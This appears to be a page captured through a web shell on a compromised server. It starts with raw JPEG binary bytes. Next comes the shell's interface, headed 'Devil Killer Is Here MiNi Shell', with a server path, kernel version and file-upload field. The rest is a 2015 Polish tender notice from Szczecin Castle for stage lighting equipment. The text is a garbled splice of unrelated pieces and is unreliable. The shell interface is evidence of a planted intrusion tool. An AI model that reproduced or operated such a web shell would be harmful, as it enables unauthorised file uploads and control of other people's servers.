JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20150806/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20150806/201072-N-2015.html

<p class="kh_header"><b>Szczecin: Dostawa sprzętu oświetleniowego oraz urządzeń peryferyjnych na potrzeby Zamku Książąt Pomorskich w Szczecinie</b><br>
<b>Numer ogłoszenia: 201072 - 2015; data zamieszczenia: 06.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zamek Książąt Pomorskich , ul. Korsarzy 34, 70-540 Szczecin, woj. zachodniopomorskie, tel. 091 4338842, faks 091 4347984.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zamek.szczecin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytucja Kultury wpisana do Rejestru Samorządu Zachodniopomorskiego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu oświetleniowego oraz urządzeń peryferyjnych na potrzeby Zamku Książąt Pomorskich w Szczecinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny</b></p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa sprzętu oświetlenia scenicznego oraz urządzeń peryferyjnych z montażem i konfiguracją na potrzeby Zamku Książąt Pomorskich w Szczecinie 
Zamówienie obejmuje próbne uruchomienie systemu oświetlenia scenicznego.
Specyfikacja techniczna wyposażenia dla systemu oświetlenia scenicznego zawarta jest w załączniku nr 7 do SIWZ.
1. Reflektor PC 1000W 14 szt.
Projektor PC 1000W o zmiennym kącie świecenia 12-52 stopnie w komplecie z linką zabezpieczającą, uchwytem montażowym ALISCAF czarnym na rurę 50 mm, ramką na filtr, skrzydełkami ograniczającymi oraz żarówką o parametrach:
trzonek na żarówkę: GX9,5
możliwość zamontowania żarówki 650W 
soczewka o średnicy 150 mm
obudowa z aluminiowego odlewu
tylnie pokrętło służące do adjustacji kąta świecenia
możliwość zamontowania skrzydełek ograniczających
masa do 8 kg	
2.Reflektor profilowy 6 szt.
Energooszczędny projektor profilowy 750W o zmiennym lub stałym kącie świecenia  25-50 stopni w komplecie z przesłoną iris, uchwytem do gobo, linką zabezpieczającą, uchwytem montażowym ALISCAF czarnym na rurę 50 mm oraz żarówką o parametrach:
możliwość wymiany tubusów na inne o kątach zmiennych 15-30, 25-50 stopni oraz stałych: 5/10/19/26/36/50/70/90 stopni oraz soczewki do projekcji gobo
możliwość wymiany lampy na 575W i 375W
ostrość plamy świetlnej oraz ewentualny rozsył kątowy regulowany jednym pokrętłem ze skalą
łatwa adjustacja lampy przy pomocy jednego pokrętła
możliwość obrotu tubusa +/- 25 stopni
w komplecie cztery ramki profilowe oraz ramka na filtr koloru
slot do gobo szklanego lub metalowego
zasuwany drugi slot na przesłonę Iris lub inne efekty zmotoryzowane
izolowany termicznie tylni uchwyt ułatwiający ustawienie reflektora
odbłyśnik pochłaniający 90% promieniowania IR i zapewniający dłuższą żywotność filtrów barwnych
asferyczne soczewki z powłoką antyrefleksyjną zapewniające lepszą transmisję światła
łatwy dostęp do wnętrza tubusa 
odbłyśnik oraz soczewki zamontowane na specjalnych uchwytach minimalizujących wibracje	
3. Reflektor typu Blinder 2 szt.
Profesjonalna obudowa typu Blinder dla czterech sztuk żarówek (min. 650W), w kolorze czarnym. W komplecie z żarówkami, uchwytem montażowym i linką zabezpieczającą.
Urządzenie należy dostarczyć wraz ze skrzynią transportową, na kółkach, przystosowaną do składowania jednej skrzyni na drugiej.	
4. Ruchoma głowa LED typu SPOT 4	 szt.
Reflektor automatyczny typu ruchoma głowa spot na  module LED,  o parametrach nie gorszych niż:
źródło światła moduł LED o mocy większej niż 400W
układ optyczny z płynnym zoom w zakresie minimalnym 12° - 36° 
zdalnie ustawiana ostrość 
tarcza z minimum 7 gobo stałych, wymiennych
tarcza z minimum 5 gobo rotacyjnych, indeksowalnych, wymiennych 
iris 
pryzma rotacyjna 
efekt FROST - płynny
dimmer elektroniczny 
strobo ze zmienną prędkością oraz efekt strobowania i pulsowania
zdalnie sterowany ruch w osi PAN i TILT
obsługa protokołów: ART-net, RDM, DMX
waga do 30 kg
urządzenie należy dostarczyć wraz z uchwytami montażowymi, linką zabezpieczającą oraz skrzynią transportową podwójną, na kółkach, przystosowaną do składowania jednej skrzyni na drugiej	
5. Ruchoma głowa LED typu PROFIL 4 szt.
Reflektor automatyczny typu ruchoma głowa profil na  module LED, o parametrach nie gorszych niż:
źródło światła - moduł LED o mocy powyżej 400W
natężenie oświetlenia przy kącie 10 stopni z odległości 14m mierzone na kolorze czerwonym ponad 300 Lux, na kolorze niebieskim ponad 90 Lux, na kolorze zielonym ponad 630 Lux
układ optyczny z płynnym zoom w minimalnym zakresie od 10° - 40° z rozdzielczością 16 bit 
płynna regulacja CTO
system ramek profilowych - 4 niezależne ostrza 
pozycjonowanie systemu profilowego minimum +/- 30 stopni
tarcza animacyjna
tarcza z minimum 5 gobo rotacyjnych, indeksowalnych, 
iris
pryzma rotacyjna 
efekt FROST - płynny
dimmer elektroniczny 
strobo ze zmienną prędkością oraz efekt strobowania i pulsowania
zdalnie sterowany ruch w osi PAN i TILT
waga do 60 kg
obsługa protokołu DMX, RDM, ART-net
urządzenie należy dostarczyć wraz z uchwytami montażowymi, linką zabezpieczającą oraz ze skrzynią transportową podwójną, na kółkach, przystosowaną do składowania jednej skrzyni na drugiej.
6. Ruchoma głowa LED typu WASH 6 szt.
Reflektor automatyczny ruchoma głowa typu WASH z ledowymi źródłami światła, o parametrach nie gorszych niż:
minimum 37 sztuk 15W multichip RGBW LED,
żywotność źródeł światła - powyżej 45.000h
układ optyczny z płynnym zoom w zakresie minimalnym od 15°-63°
system mieszania barw bazujący na czterech składowych R (czerwony), G (zielony), B (niebieski), W (biały) w jednym punkcie 16 bit
wirtualna tarcza z minimum 50 kolorami 
płynna regulacja temperatury barwowej CTO
DIMMER z rozdzielczością 16 bit
możliwość niezależnego sterowania każdego z trzech okręgów LED 
efekt STROBO do 20 błysków na sekundę
ruch w trybie tracking i vector z rozdzielczością 16 bit -  450° w PAN i 270° w TILT
3 i 5 pin złącza XLR
bateryjne podtrzymanie zasilania wyświetlacza kontrolnego
złącze Ethernet obsługujące ART-net, RDM, DMX
waga do 20 kg
Urządzenie należy dostarczyć wraz z uchwytami montażowymi, linką zabezpieczającą oraz ze skrzynią transportową podwójną, na kółkach, przystosowaną do składowania jednej skrzyni na drugiej
7. Ruchoma głowa LED typu WASH (mała) 2 szt.
Reflektor automatyczny ruchoma głowa typu WASH z ledowymi źródłami światła, o parametrach technicznych nie gorszych niż:
co najmniej 19 diod multichip RGBW LED,
żywotność źródeł światła - powyżej 50.000h
symulacja pracy oprawy ze źródłem halogenowym
możliwość niezależnego sterowania każdego z trzech okręgów LED z rozdzielczością 16 bit
3 i 5 pin złącza XLR
złącze Ethernet obsługujące ART-net, MAnet, MA2net  oraz RDM
waga do 12 kg
Pozostałe wymagania:
Urządzenie powinno być kompatybilne z urządzeniem posiadanym przez Zamek Książąt Pomorskich typu ROBE Led Wash 300. Kompatybilność urządzenia powinna polegać na jednakowym sterowaniu urządzeniem w zakresie dimmera, ruchu, zakresu zoom, zmian kolorów, temperatur barwowych i jednakowym ich odwzorowaniu. Ma to na celu szybkie uzyskiwanie spójnych efektów i łatwości sterowania dla grup urządzeń. Jednakowe wartości kanałów DMX muszą być przyporządkowane do jednakowych efektów, kolorów i temperatur barwowych w aparatach posiadanych i oferowanych.
Urządzenie należy dostarczyć wraz z uchwytami montażowymi, linką zabezpieczającą oraz ze skrzynią transportową podwójną, na kółkach, przystosowaną do składowania jednej skrzyni na drugiej
8. Ruchoma głowa LED typu SPOT 1, 2 szt.
Ruchoma głowa typu Spot, ze źródłem diodowym o parametrach technicznych nie gorszych niż:
źródło typu multichip z minimum 4 barwami podstawowymi np: RGBW, RGBY, RGBA
natężenia oświetlenia zmierzone na kolorze czerwonym z odległości 20m, przy kącie rozsyłu 8 stopni minimum 290 LUX
zakres zoom w minimalnym zakresie 8 - 40 stopni
tarcze gobosów indeksowalnych  z minimum 5 slotami na gobo każda tarcza
obsługiwane protokoły: DMX512, RDM, ART-net
wymagane jest aby urządzenie posiadało klasę ochrony co najmniej IP65, wbudowany odbiornik DMX bezprzewodowy oraz możliwość zmiany adresu i parametrów urządzenia poprzez protokół RFID.
Urządzenie należy dostarczyć wraz z uchwytami montażowymi, linką zabezpieczającą oraz ze skrzynią transportową podwójną, na kółkach, przystosowaną do składowania jednej skrzyni na drugiej
9. Naświetlacze LED 4 szt.
Naświetlacz diodowy zewnętrzny o parametrach technicznych nie gorszych niż:
co najmniej 12 diod typu multichip RGBW
moc pojedynczej diody R, G, B i W co najmniej 8W
co najmniej 3 wymienne optyki
ruch w osi Tilt co najmniej 180 stopni
obsługiwane protokoły: DMX512, RDM
zasilacz zintegrowany w urządzeniu
waga maksymalna 9kg
klasa ochrony IP co najmniej IP65
możliwość zamontowania skrzydełek ograniczających
Urządzenie należy dostarczyć wraz z uchwytami montażowymi, linką zabezpieczającą oraz ze skrzynią transportową podwójną, na kółkach, przystosowaną do składowania jednej skrzyni na drugiej
10. Maszyna do wytwarzania mgły 1	szt.
Maszyna do dymu typu hazer wyposażona w wentylator do rozdmuchiwania dymu, w wymienny filtr zabezpieczający maszynę przed kurzem i innymi zanieczyszczeniami powietrza. Możliwość płynnej regulacji obrotów wentylatora oraz ilości dymu w celu osiągnięcia dowolnego efektu zadymienia: od lekkiego aż do pełnego zbliżonego do ciężkiej mgły.
Parametry minimalne:
moc grzałki min 1.500 W
wydajność min 90 m3/min
wydajność płynu- (100%) 1 litr min. 1 godzinę
czas nagrzewania max. 1,5 minuty
pojemność zbiornika min. 1 litr
sterowanie DMX 512 oraz lokalnie z wbudowanego panelu
waga max 10kg
Urządzenie należy dostarczyć wraz z pełnym zbiornikiem na płyn oraz skrzynią transportową, na kółkach, przystosowaną do składowania jednej skrzyni na drugiej.
11. Bezprzewodowy DMX (nadajnik + odbiornik) 1 kpl.
System bezprzewodowej transmisji sygnału DMX (1 nadajniki, 1 odbiornik)
Podstawowe wymagania, które musi spełniać system:
system składający się nadajnika i odbiorników działających z częstotliwością 2.4GHz i 5.8GHz
system transmisji zapewniający brak interferencji z innymi bezprzewodowymi systemami transmisji danych jak Bluetooth i WiFi
identyczne obudowy dla nadajnika i odbiornika
kompaktowe wymiary obudowy, z możliwością zawieszenia ich na konstrukcji scenicznej 
nadajnik/odbiornik wyposażony w 1 wejście/wyjście DMX XLR 5pin
łatwa konfiguracja systemu, typu plug and play po naciśnięciu jednego przycisku
możliwość zastosowania do 512 odbiorników do każdego nadajnika
możliwość dodawania/usuwania odbiorników w trakcie pracy całego systemu 
standardowa antena 2dBi 
możliwość zwiększenia zasięgu, poprzez użycie opcjonalnych anten,	 
12. Przewody DMX - 2m, 20 szt.
złącze XLR 5 pin dł. 2m 	
13. Przewody DMX - 10m, 3 szt.
złącze XLR 5 pin dł. 10m	
14. Przewody DMX - 20m, 2 szt.
złącze XLR 5 pin dł. 20m 	
15. Zakończenie linii DMX tzw. terminator (opornik 120 Ohm) 5 pin, 4 szt.
złącze XLR 5 pin 	
16. Zakończenie linii DMX tzw. terminator (opornik 120 Ohm) 3 pin, 4 szt.
złącze XLR 3 pin 	
17. Konsoleta oświetleniowa 1 szt.
Konsoleta oświetleniowa do sterowania reflektorami konwencjonalnymi oraz urządzeniami automatycznymi o parametrach technicznych nie gorszych niż:
co najmniej 3 ekrany dotykowe
możliwość podłączenia czwartego ekranu dotykowego
wbudowany darmowy wizualizer 3D
dostępne darmowe oprogramowanie do edycji na komputerze
co najmniej 3 enkodery kołowe
główny playback z dwoma suwakami 100 mm
co najmniej 12 suwaków typu PlayBack
co najmniej 4 fizyczne wyjścia DMX
obsługa co najmniej 8 linii DMX w sumie (DMX + ArtNet)
możliwość podłączenia zewnętrznych paneli z suwakami
obsługa protokołów: DMX512, ArtNet, sACN
konsoleta wyposażona w skrzynię transportową
Do konsolety należy dostarczyć pełen system backupowy umożliwiający zaprogramowanie spektaklu na komputerze i odtworzenie spektaklu z wykorzystaniem komputera i specjalnej bramki. W skład systemu backupwego powinny wejść:
bramka do połączenia z komputerem poprzez sieć Ethernet. Bramka powinna posiadać co najmniej 4 wyjścia DMX
komputer przenośny typu laptop z ekranem o przekątnej minimum 15 cali, procesorem klasy co najmniej i5, dedykowaną kartą graficzną stabilnie obsługującą oprogramowanie konsolety
switch sieciowy zarządzalny z minimum ośmioma portami Gigabit
przewody zasilające oraz sygnałowe
skrzynia transportowa 	
18. Monitor dotykowy do konsolety oświetleniowej 1 szt.
Monitor dotykowy o parametrach technicznych nie gorszych niż:
format obrazu 4:3
przekątna co najmniej 19 cali
jasność co najmniej 250 cd/m
rozdzielczość co najmniej 1280 x 1024
rezystancyjny panel dotykowy
rozpoznawanie dotyku dowolnym przedmiotem
skrzynia transportowa	
19. Skrzynia transportowa na okablowanie 1 szt.
przystosowana do składowania jednej skrzyni na drugiej 
na kółkach, 
ze sklejki o grubości 6.5 mm- 9 mm
z zamkami motylkowymi
z metalowymi rączkami kasetowymi
z aluminiowymi profilami narożnymi
w skrzyni powinny się zmieścić kable sterujące jak i zasilające.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 31.52.00.00-7, 31.52.70.00-6, 31.50.00.00-1, 31.68.22.10-5, 31.22.48.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium w wysokości 12.000,00 zł w jednej z dopuszczalnych form określonych w Rozdziale IX pkt 2 SIWZ i załączenia potwierdzenia jego wniesienia do Oferty. 
2. Wadium może być wniesione w jednej lub kilku następujących formach:
1) pieniądzu;
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3) gwarancjach bankowych;
4) gwarancjach ubezpieczeniowych;
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2  ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity: Dz. U. z 2007 r. Nr 42, poz. 275 z późn. zm.).
3. Wadium w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamku Książąt Pomorskich  w Szczecinie, w banku Bank Gospodarstwa Krajowego O/Szczecin, ul. Tkacka 4 w Szczecinie nr konta 56-1130-1176-0022-2047-7820-0001 z dopiskiem Wadium w postępowaniu przetargowym nr sprawy: ZP.312.8.2015.DO
4.W przypadku wniesienia wadium w formie gwarancji lub poręczenia, oryginał dokumentu należy złożyć w sekretariacie Zamku Książąt Pomorskich w Szczecinie na II piętrze, pokój nr 206 ul. Korsarzy 34, 70-540 Szczecin, w godzinach 8.00 -16.00 zaś kopię dokumentu należy załączyć do oferty.
5. Wadium musi być wniesione przed upływem terminu składania ofert. Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie znajdzie się na rachunku bankowym Zamawiającego. Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.
6. Zasady zwrotu oraz zatrzymania wadium określone są w art. 46 ust. 1-5 ustawy Prawo zamówień  publicznych.
7. W treści wadium składanego w formie innej niż pieniądz muszą być wyszczególnione okoliczności, w jakich Zamawiający może je zatrzymać. Okoliczności te muszą zawierać sytuacje określone:
1) W art. 46 ust. 4a Prawa zamówień publicznych, tj. jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co spowodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.
2) W art. 46 ust. 5 Prawa zamówień publicznych, tj.: jeżeli Wykonawca, którego oferta została wybrana:
a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
c) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
8. Poza tym z powyższego dokumentu powinno wynikać jednoznacznie gwarantowanie wypłaty należności w sposób nieodwołalny, bezwarunkowy i na pierwsze żądanie bez konieczności potwierdzenia podpisu złożonego pod żądaniem Zamawiającego. Wadium takie powinno obejmować cały okres związania ofertą, poczynając od daty składania ofert. 
9. Wadium wniesione przez jednego ze wspólników konsorcjum uważa się za wniesione prawidłowo.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu o udzielenie zamówienia mogą brać udział Wykonawcy, którzy spełniają warunki dotyczące posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. 
Opis warunku:
Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu oraz braku podstaw do wykluczenia z postępowania w oparciu o analizę oświadczeń i załączonych dokumentów, metodą: spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu o udzielenie zamówienia mogą brać udział Wykonawcy, którzy spełniają warunki dotyczące posiadania wiedzy i doświadczenia. 
W postępowaniu mogą wziąć udział Wykonawcy, którzy w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali co najmniej 1 zamówienie na dostawę montaż i konfigurację sprzętu oświetleniowego o wartości co najmniej 500.000 tysięcy zł brutto.
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu oraz braku podstaw do wykluczenia z postępowania w oparciu o analizę oświadczeń i załączonych dokumentów, metodą: spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu o udzielenie zamówienia mogą brać udział Wykonawcy, którzy spełniają warunki dotyczące dysponowania odpowiednim potencjałem technicznym  do wykonania zamówienia. 
Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu oraz braku podstaw do wykluczenia z postępowania w oparciu o analizę oświadczeń i załączonych dokumentów, metodą: spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu o udzielenie zamówienia mogą brać udział Wykonawcy, którzy spełniają warunki dotyczące dysponowania osobami zdolnymi do wykonania zamówienia. 
W postępowaniu mogą wziąć udział Wykonawcy, którzy dysponują lub będą dysponować minimum 1 osobą - specjalistą odpowiedzialnym za montaż i konfigurację sprzętu u Zamawiającego, posiadającym wyższe wykształcenie techniczne o specjalności projektowanie systemów oświetlenia lub inżynieria światła z doświadczeniem jako koordynator przy realizacji co najmniej 1 zamówienia polegającego na dostawie, montażu i uruchomieniu systemu oświetlenia o wartości co najmniej 500.000,00 zł brutto.
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu oraz braku podstaw do wykluczenia z postępowania w oparciu o analizę oświadczeń i załączonych dokumentów, metodą: spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu o udzielenie zamówienia mogą brać udział Wykonawcy, którzy spełniają warunki dotyczące sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia
Opis warunku:
Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu oraz braku podstaw do wykluczenia z postępowania w oparciu o analizę oświadczeń i załączonych dokumentów, metodą: spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

